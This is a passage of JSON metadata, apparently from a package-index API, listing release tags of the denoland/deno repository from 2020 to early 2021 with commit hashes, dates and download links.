arsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.3/manifests"},{"name":"v1.7.2","sha":"647f11b3acc2f629a6d77836f5f6ef74ee10c4ce","kind":"commit","published_at":"2021-02-05T19:33:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.2/manifests"},{"name":"v1.7.1","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.1/manifests"},{"name":"std/0.85.0","sha":"11dd6f201378fe04cccadb46b7054cc2f791dda8","kind":"commit","published_at":"2021-01-29T14:53:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.85.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.85.0/manifests"},{"name":"v1.7.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.7.0/manifests"},{"name":"std/0.84.0","sha":"0f7a02500c0abdaae4ecfa89259c026c624773a9","kind":"commit","published_at":"2021-01-20T05:24:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.84.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.84.0/manifests"},{"name":"v1.6.3","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.3/manifests"},{"name":"std/0.83.0","sha":"b07a0b640d01d87c926a74d42e26a6561848c7c5","kind":"commit","published_at":"2020-12-30T15:13:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.83.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.83.0/manifests"},{"name":"v1.6.2","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.2/manifests"},{"name":"std/0.82.0","sha":"d199e45ad5dd180a6969abcd528023e173a1e1ff","kind":"commit","published_at":"2020-12-22T16:00:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.82.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.82.0/manifests"},{"name":"v1.6.1","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.1/manifests"},{"name":"std/0.81.0","sha":"b6d5ae1ecd125ce8a14cddc877cb66dbcfc9bb04","kind":"commit","published_at":"2020-12-14T20:25:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.81.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.81.0/manifests"},{"name":"v1.6.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.6.0/manifests"},{"name":"std/0.80.0","sha":"df87bf1d6a43ca36b520b45913839fd1f16df595","kind":"commit","published_at":"2020-12-08T14:37:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.80.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.80.0/manifests"},{"name":"v1.5.4","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.4/manifests"},{"name":"std/0.79.0","sha":"bc79d556496420441977ca6f5c66be3dc3ded187","kind":"commit","published_at":"2020-11-23T14:10:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.79.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.79.0/manifests"},{"name":"v1.5.3","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.3/manifests"},{"name":"std/0.78.0","sha":"ab7b8ba8d15f37d6244784a16a3f4f3c96e38769","kind":"commit","published_at":"2020-11-16T10:14:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.78.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.78.0/manifests"},{"name":"v1.5.2","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.2/manifests"},{"name":"std/0.77.0","sha":"71d7482577ee187187051ac8d9976a5387c038db","kind":"commit","published_at":"2020-11-08T23:58:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.77.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.77.0/manifests"},{"name":"v1.5.1","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.1/manifests"},{"name":"std/0.76.0","sha":"03769f11b5db314c550478852317d9ea108c2f76","kind":"commit","published_at":"2020-10-31T14:32:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.76.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.76.0/manifests"},{"name":"v1.5.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.5.0/manifests"},{"name":"std/0.75.0","sha":"dd01f206da0b7e1b305e70cdd3c98bf60fbefc5d","kind":"commit","published_at":"2020-10-27T15:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.75.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.75.0/manifests"},{"name":"v1.4.6","sha":"9e9ec9784a639ef7205e1e303301ee558439b045","kind":"commit","published_at":"2020-10-10T10:30:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.6","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.6/manifests"},{"name":"v1.4.5","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.5/manifests"},{"name":"std/0.74.0","sha":"b5e4b63a880ae41bd33dce5276c925ab7bd9519f","kind":"commit","published_at":"2020-10-08T12:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.74.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.74.0/manifests"},{"name":"v1.4.4","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.4/manifests"},{"name":"std/0.73.0","sha":"ae1ed2d16687413381fc7e6b55dca9b1676855f6","kind":"commit","published_at":"2020-10-03T12:58:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.73.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.73.0/manifests"},{"name":"v1.4.3","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.3/manifests"},{"name":"std/0.72.0","sha":"63efa5f15dccf48d7a27f7d55344f1de63f786af","kind":"commit","published_at":"2020-10-02T12:37:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.72.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.72.0/manifests"},{"name":"v1.4.2","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.2/manifests"},{"name":"std/0.71.0","sha":"dacb340f8fe959ebf2949ff6e7480935556a9813","kind":"commit","published_at":"2020-09-25T14:53:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.71.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.71.0/manifests"},{"name":"v1.4.1","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:40:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.1/manifests"},{"name":"std/0.70.0","sha":"d6f3de6feb006bf6911b938bfa43a3655c962c50","kind":"tag","published_at":"2020-09-18T19:38:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.70.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.70.0/manifests"},{"name":"v1.4.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.4.0/manifests"},{"name":"std/0.69.0","sha":"b3fa81f867f933df41f274bd8eec10dddf1b1b28","kind":"commit","published_at":"2020-09-13T14:35:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.69.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.69.0/manifests"},{"name":"v1.3.3","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.3/manifests"},{"name":"std/0.68.0","sha":"a14b3c9e30a1b18f70519eac03be5a4648b65036","kind":"commit","published_at":"2020-09-04T16:15:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.68.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.68.0/manifests"},{"name":"v1.3.2","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.2/manifests"},{"name":"std/0.67.0","sha":"ac705b793612db6cc11b13270907e216e07460b3","kind":"commit","published_at":"2020-08-29T13:53:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.67.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.67.0/manifests"},{"name":"v1.3.1","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.1/manifests"},{"name":"std/0.66.0","sha":"999e5cf3d44ba41d988f0f3b4f94439a3b794bdc","kind":"commit","published_at":"2020-08-21T16:11:33.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.66.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.66.0/manifests"},{"name":"v1.3.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.3.0/manifests"},{"name":"std/0.65.0","sha":"b38c3132768e0f5132763db9c8fdc2a4a9490bde","kind":"commit","published_at":"2020-08-13T16:10:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.65.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.65.0/manifests"},{"name":"v1.2.3","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.3/manifests"},{"name":"std/0.64.0","sha":"92a173bca618cf6ef1e54c08deee61ba617491b9","kind":"commit","published_at":"2020-08-08T22:59:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.64.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.64.0/manifests"},{"name":"v1.2.2","sha":"7446230e6b39a0d3ce70b8fffbed3ebc63e8c762","kind":"commit","published_at":"2020-07-31T19:14:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.2.2","manifests_